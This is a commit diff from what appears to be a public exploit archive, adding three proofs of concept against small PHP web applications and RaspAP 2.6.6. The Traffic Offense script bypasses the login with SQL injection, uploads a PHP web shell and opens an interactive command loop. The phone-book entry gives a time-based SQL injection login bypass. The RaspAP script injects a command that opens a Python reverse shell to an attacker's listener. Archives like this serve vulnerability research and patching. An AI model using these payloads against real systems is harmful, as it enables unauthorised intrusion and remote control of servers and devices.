DB: 2021-08-24

3 changes to exploits/shellcodes Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
2021-08-24 05:01:53 +00:00 · 2021-08-24 05:01:53 +00:00 · 1e25d57030
commit 1e25d57030
parent 122cf00790
4 changed files with 194 additions and 0 deletions
--- a/exploits/php/webapps/50221.py
+++ b/exploits/php/webapps/50221.py
@ -0,0 +1,121 @@
 # Exploit Title: Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
 # Date: 20-08-2021
 # Exploit Author: Halit AKAYDIN (hLtAkydn)
 # Vendor Homepage: https://www.sourcecodester.com
 # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
 # Version: V1
 # Category: Webapps
 # Tested on: Linux/Windows
 # Online Traffic Offense Management System
 # contains a file upload vulnerability that allows for remote 
 # code execution against the target.  This exploit requires 
 # the user to be authenticated, but a SQL injection in the login form 
 # allows the authentication controls to be bypassed
 # File uploaded from "/admin/?page=user" has no validation check
 # and the directory it is placed in allows for execution of PHP code.
 """
 (hltakydn@SpaceSec)-[~/Exploits-db/traffic_offense]
 $ python2 exploit.py
 Example: http://example.com
 Url: http://trafficoffense.com
 [?] Check Adress
 [+] Bypass Login
 [+] Upload Shell
 [+] Exploit Done!
 $ whoami
 www-data
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 $ pwd
 /var/www/html/uploads
 $ 
 """
 #!/usr/bin/env python2
 import requests
 import time
 from bs4 import BeautifulSoup
 print ("\nExample: http://example.com\n")
 url = raw_input("Url: ")
 payload_name = "evil.php"
 payload_file = "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
 if url.startswith(('http://', 'https://')):
    print "Check Url ...\n"
 else:
    print "\n[?] Check Adress\n"
    url = "http://" + url
 try:
    response = requests.get(url)
 except requests.ConnectionError as exception:
    print("[-] Address not reachable")
    sys.exit(1)
 session = requests.session()
 request_url = url + "/classes/Login.php?f=login"
 post_data = {"username": "'' OR 1=1-- '", "password": "'' OR 1=1-- '"}
 bypass_user = session.post(request_url, data=post_data)
 if bypass_user.text == '{"status":"success"}':
    print ("[+] Bypass Login\n")
    cookies = session.cookies.get_dict()
    req = session.get(url + "/admin/?page=user")
    parser = BeautifulSoup(req.text, 'html.parser')
    userid = parser.find('input', {'name':'id'}).get("value")
    firstname = parser.find('input', {'id':'firstname'}).get("value")
    lastname = parser.find('input', {'id':'lastname'}).get("value")
    username = parser.find('input', {'id':'username'}).get("value")
    request_url = url + "/classes/Users.php?f=save"
    headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryxGKa5dhQCRwOodsq", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
    data = "------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ userid +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+ firstname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+ lastname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+ username +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+ payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n" + payload_file +"\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq--\r\n"
    upload = session.post(request_url, headers=headers, cookies=cookies, data=data)            
    time.sleep(2)
    if upload.text == "1":
        print ("[+] Upload Shell\n")
        time.sleep(2)
        req = session.get(url + "/admin/?page=user")
        parser = BeautifulSoup(req.text, 'html.parser')
        find_shell = parser.find('img', {'id':'cimg'})
        print ("[+] Exploit Done!\n")
        while True:
            cmd = raw_input("$ ")
            headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'}
            request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)
            print request.text.replace("<pre>" ,"").replace("</pre>", "")
            time.sleep(1)
    elif upload.text == "2":
        print ("[-] Try the manual method")
        request_url = url + "/classes/Login.php?f=logout"
        cookies = session.cookies.get_dict()
        headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "sec-ch-ua-mobile": "?0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
        session.get(request_url, headers=headers, cookies=cookies)
    else:
        print("[!]An unknown error")
 else:
    print ("[-] Failed to bypass login panel")
--- a/exploits/php/webapps/50223.txt
+++ b/exploits/php/webapps/50223.txt
@ -0,0 +1,25 @@
 # Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
 # Date: 21/08/2021
 # Exploit Author: Justin White
 # Vendor Homepage: https://www.sourcecodester.com
 # Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
 # Version: 1.0
 # Testeted on: Linux (Ubuntu 20.04) using LAMPP
 ## SQL Injection
 # Vulnerable page
 http://localhost/PhoneBook/index.php
 # Vulnerable paramater 
 username1 & password
 # POC
 Username = ' or sleep(5)='-- -
 Password = ' '
 Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
 # Vulnerable Code
 index.php line 13
 $sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
--- a/exploits/php/webapps/50224.py
+++ b/exploits/php/webapps/50224.py
@ -0,0 +1,45 @@
 # Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
 # Date: 23.08.2021
 # Exploit Author: Moritz Gruber <moritz@aware7.de>
 # Vendor Homepage: https://raspap.com/
 # Software Link: https://github.com/RaspAP/raspap-webgui
 # Version: 2.6.6
 # Tested on: Linux raspberrypi 5.10.52-v7+
 import requests
 from requests.api import post
 from requests.auth import HTTPBasicAuth
 from bs4 import BeautifulSoup
 import sys, re
 if len(sys.argv) != 7:
    print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
    sys.exit()
 else:  
    target_host = sys.argv[1]
    target_port = sys.argv[2]
    username = sys.argv[3]
    password = sys.argv[4]
    listener_host = sys.argv[5]
    listener_port = sys.argv[6]
    endpoint = "/wpa_conf"
    exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    url = "http://{}:{}/{}".format(target_host,target_port,endpoint)
    s = requests.Session()
    get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
    soup = BeautifulSoup(get_Request.text, "lxml")
    csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
    post_data = {
        "csrf_token": csrf_token,
        "connect": "wlan; {}".format(exploit)
    }
    post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
    if post_Request.status_code:
        print("Exploit send.")
    else:
        print("Something went wrong.")
    print("Done")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44347,3 +44347,6 @@ id,file,description,date,author,type,platform,port
 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,
 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php,
 50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-20,"Azumah Foresight Xorlali",webapps,php,
 50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-23,"Halit AKAYDIN",webapps,php,
 50223,exploits/php/webapps/50223.txt,"Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)",2021-08-23,"Justin White",webapps,php,
 50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",2021-08-23,"Moritz Gruber",webapps,php,